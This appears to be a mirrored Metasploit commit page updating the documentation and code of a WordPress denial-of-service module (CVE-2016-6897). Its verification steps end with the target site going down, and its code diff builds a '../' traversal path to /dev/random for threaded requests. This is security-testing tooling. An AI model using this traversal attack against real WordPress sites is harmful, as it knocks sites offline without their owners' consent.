infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update directory traversal DoS module and docs

bug/bundler_fix
root 2017-05-29 00:30:23 +02:00
parent 9b9d2f2345
commit 72a5142e37
2 changed files with 14 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
View File

@ -1,5 +1,12 @@
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
## Verification
## Vulnerable Application
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin (https://core.trac.wordpress.org/changeset/38168) function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
You can find the vulnerable application from the official website:
https://wordpress.org/download/release-archive/
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
@ -11,6 +18,9 @@ This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp
8. WordPress website should be down
## Scenarios
### Wordpress 4.5.3 on Linux Mint 17.3
https://wordpress.org/wordpress-4.5.3.tar.gz
```
msf auxiliary(wordpress_directory_traversal_dos) > exploit

9
modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
View File

@ -27,8 +27,7 @@ class MetasploitModule < Msf::Auxiliary
[
['CVE', '2016-6897'],
['EDB', '40288'],
['OVEID', 'OVE-20160712-0036'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6897']
['OVEID', 'OVE-20160712-0036']
],
))
@ -127,11 +126,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
path = '/'
1.upto(depth) do |i|
path += '../'
end
path += 'dev/random'
path = "/#{'../' * depth}dev/random"
while starting_thread < rlimit do
ubound = [rlimit - (starting_thread - 1), thread_count].min